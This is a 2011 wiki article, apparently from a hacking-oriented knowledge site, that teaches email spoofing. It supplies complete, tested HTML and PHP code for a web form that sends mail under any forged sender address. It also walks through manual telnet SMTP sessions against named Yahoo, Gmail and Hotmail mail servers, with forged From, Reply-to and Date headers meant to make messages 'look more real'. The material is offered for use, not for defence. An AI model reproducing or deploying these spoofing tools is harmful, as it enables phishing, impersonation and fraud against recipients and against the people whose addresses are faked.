Spoofing and Hacking Email / Emails

From Knowledge Database

Jump to: navigation, search

Contents

Overview

  • Email spoofing or email spoof is a method where one sends an email from another email address or even non existing address.

for example it is possible to send email from address that does not exist, such as [email protected] or it is possible to send an email from somebody elses email, such as [email protected] (which most likely exists).

  • Email spoofing can be achieved in several ways, most common is to use microsoft telnet, which is built into most windows versions.


Also known as

  • Email spoof
  • Email spoofing
  • Email hacking
  • Email hack
  • Email hacks
  • Email spoofer
  • Fake Email
  • Faked Email
  • Faking Email




Tutorials

PHP / HTML script

  • This method is most likely to work for every user and it has been tested by me (Sethioz).

It is a scrip that sends email via webpage which code is available here.

  • First it is needed to make a .html file and call it anything you like, here is used spoofer.html
  • Inside spoofer.html is this code:
 <form action="spoofer.php" method="GET">
 <p>To Email: <input type="text" name="email" /></p>
 <p>Subject: <input type="text" name="header" /></p>
 <p>From Email: <input type="text" name="fake" /></p>
 <p>Email Message: <textarea name="message"></textarea></p>
 <p><input type="submit" value="Send Email"></p>
 </form>
  • Now it is needed to make another file and call it spoofer.php or anything else (in this case spoofer.php in above code has to be changed to same, if not sure, use spoofer.php as in this example)
  • Inside of spoofer.php is the following code:
<?php
 if (!isset($_GET[email]) || empty($_GET[email]))
 {
 echo "TO field is empty";
 exit;
 }
 else
 {
 $to = $_GET[email];
 }
 if (!isset($_GET[header]) || empty($_GET[header]))
 {
 echo "Subject is missing";
 exit;
 }
 else
 {
 $subject = $_GET[header];
 }
 if (!isset($_GET[fake]) || empty($_GET[fake]))
 {
 echo "FROM email address is missing";
 exit;
 }
 else
 {
 $fake = $_GET[fake];
 }
 if (!isset($_GET[message]) || empty($_GET[message]))
 {
 echo "email message box is empty";
 exit;
 }
 else
 {
 $message = $_GET[message];
 }
 $headers = "MIME-Version: 1.0" . "\r\n";
 $headers .= "Content-type:text/html;charset=iso-8859-1" . "\r\n";
 $headers .= "From: " . $fake . " <" . $fake . ">" . "\r\n";
 if (mail($to, $subject, $message, $headers))
 {
 echo"<h1>Success</h1>\n";
 echo"<p>The e-mail was successfully sent to <i>" . $to . "</i></p>\n";
 echo"<p>From: <i>" . $fake . "</i></p>\n";
 echo"<p>Subject: <i>" . $subject . "</i></p>\n";
 echo"<p>Message:</p>\n";
 echo"<p><b>" . $message . "</b></p>";
 }
 else
 {
 echo"<h1>Error!</h1>\n";
 echo"<p>The mail() function failed.</p>";
 }
 ?>


  • Now it is needed to uplaod spoofer.html and spoofer.php to website, into same folder, for example /spoofer/
NOTE - webhosting where script is uploaded has to support SMTP and PHP, otherwise it will not work.
  • Now you can go to the location where you uploaded spoofer.html, fill in the fields and send the email.
NOTE - it is tested by me (Sethioz) and works 100%. i sent myself email from [email protected] and it went into inbox.


Telnet email spoofing

  • This method is not working so well nowdays, because lot of ISPs (internet service providers) are blocking outgoing ports 23 and 25 (commonly used by email, also known as SMTP).

NOTE - this method has not been fully tested by me (Sethioz), Because i have not successfull bypassed the ISP blocks

  • First it is needed to run telnet.exe, this can be done by clicking start > run > telnet (or telnet.exe) then press enter
  • now in telnet, press the following button and then enter:
o
  • This means "connect to"
  • now type in the SMTP server to use.
- This is most difficult to find, because most ISPs are blocking outgoing port 25, however here are 3 most commonly used email SMTP servers:
n.mx.mail.yahoo.com
m.mx.mail.yahoo.com
gmail-smtp-in.l.google.com
mx4.hotmail.com
  • Hotmail should have mx1 up to mx6. and yahoo also have other letters, like i, e and so on. these are tested and working.
  • Then press enter after typing in the following address.
  • If connecton has not been made, try typing the following:
n.mx.mail.yahoo.com 25
  • This is only example, it shows that port has been specified after SMTP server.
  • After successful connecton, the following has been typed in telnet:
HELO
  • Server responds with the custom welcome message (depending on SMTP server)
  • Now type:
MAIL FROM:[email protected]
  • Now type:
RCPT TO:[email protected]_mail.to
  • Now type
DATA
  • after this, you can write your message, it is better to fill in fields like Time and Date, for example if you wish to add time, simply write:
Time: 10:11:43
  • for Subject, add the following line:
Subject: Hello im fake mailer
  • Here are more commands to use in DATA in order to make it look more real:
To:[email protected]_mail.to (has to be same as RCPT TO to get best effect)
From:[email protected] (has to be same as MAIL FROM to get best effect)
Reply-to:[email protected] (should be same as From and FROM MAIL)
Date:12/12/12 (simply a date of email)
NOTE - you cannot backspace / delete in telnet, it appears like you can, but message will not be corrected at all.
  • To send message, press enter, then press . (dot / period) and enter again


Article is Not Completed / Updating
This Article is either not completed or under constant updating. If you wish to add or correct something in/to this article, then contact article author or one of the moderators (see on main page)




Sethioz 19:22, 22 August 2011 (UTC)

Personal tools